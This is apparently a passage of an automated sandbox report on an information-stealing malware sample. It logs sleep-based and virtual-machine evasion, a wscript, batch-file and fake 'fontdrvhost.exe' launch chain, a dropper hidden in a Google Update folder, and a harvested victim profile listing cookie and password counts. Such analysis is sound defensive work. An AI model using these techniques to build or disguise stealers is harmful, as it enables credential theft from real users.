                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596748s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596636s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596516s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596391s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596266s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596155s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596047s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595927s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 2196Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595797s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595687s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595578s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595469s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595344s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595234s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595122s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595008s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -594635s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -594505s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -594041s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593609s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593437s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593328s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593219s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593109s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 4952Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 2356Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 3172Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7212Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B8A69B
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B9C220
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAB348 FindFirstFileExA,0_2_00BAB348
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9E6A3 VirtualQuery,GetSystemInfo,0_2_00B9E6A3
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599765Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599546Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599326Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599218Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 100000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99891Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99782Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99667Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99547Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99438Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99313Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99188Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99063Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98944Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98829Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98704Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98579Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98454Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98329Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98204Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98078Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 97951Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597062Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596953Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596840Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596859Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596748Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596636Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596516Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596391Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596266Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596155Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596047Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595927Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595234Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595122Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595008Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594635Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594505Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594041Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593609Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593109Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                                    Source: yMxl40p9wV.24.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                                    Source: yMxl40p9wV.24.drBinary or memory string: discord.comVMware20,11696487552f
                                    Source: yMxl40p9wV.24.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                                    Source: yMxl40p9wV.24.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                                    Source: yMxl40p9wV.24.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: global block list test formVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: tasks.office.comVMware20,11696487552o
                                    Source: yMxl40p9wV.24.drBinary or memory string: AMC password management pageVMware20,11696487552
                                    Source: fontdrvhost.exe, 00000005.00000002.2226630126.000000001BAAD000.00000004.00000020.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4607725913.000000001B1B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: yMxl40p9wV.24.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                                    Source: yMxl40p9wV.24.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: dev.azure.comVMware20,11696487552j
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                                    Source: yMxl40p9wV.24.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                                    Source: wscript.exe, 00000002.00000003.2138816101.0000000003734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: yMxl40p9wV.24.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                                    Source: fontdrvhost.exe, 00000005.00000002.2226153517.000000001B9DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: yMxl40p9wV.24.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                                    Source: yMxl40p9wV.24.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                                    Source: yMxl40p9wV.24.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                                    Source: yMxl40p9wV.24.drBinary or memory string: outlook.office.comVMware20,11696487552s
                                    Source: yMxl40p9wV.24.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeAPI call chain: ExitProcess graph end nodegraph_0-23998
                                    Source: C:\Drivers\fontdrvhost.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B9F838
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BA7DEE mov eax, dword ptr fs:[00000030h]0_2_00BA7DEE
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAC030 GetProcessHeap,0_2_00BAC030
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess token adjusted: Debug
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F9D5 SetUnhandledExceptionFilter,0_2_00B9F9D5
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B9FBCA
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BA8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BA8EBD
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\Drivers\fontdrvhost.exe"
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"5","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","138727","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\google\\Update\\1.3.36.312\\Recovery\\GUR2DE8.tmp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,"Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"5","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.1",5,1,"NEWORK PC","user","138727","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\google\\Update\\1.3.36.312\\Recovery\\GUR2DE8.tmp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / Ne
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F654 cpuid 0_2_00B9F654
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B9AF0F
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformationJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeQueries volume information: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe VolumeInformation
                                    Source: C:\Drivers\fontdrvhost.exeQueries volume information: C:\Drivers\fontdrvhost.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B9DF1E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8B146 GetVersionExW,0_2_00B8B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 5.2.fontdrvhost.exe.128bc1d8.9.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3084, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: AdbXCBUViTnoVBSsOq.exe PID: 7048, type: MEMORYSTR
                                    Source: Yara matchFile source: eP6sjvTqJa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.eP6sjvTqJa.exe.6c7d6f3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.fontdrvhost.exe.150000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2110949935.0000000006C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
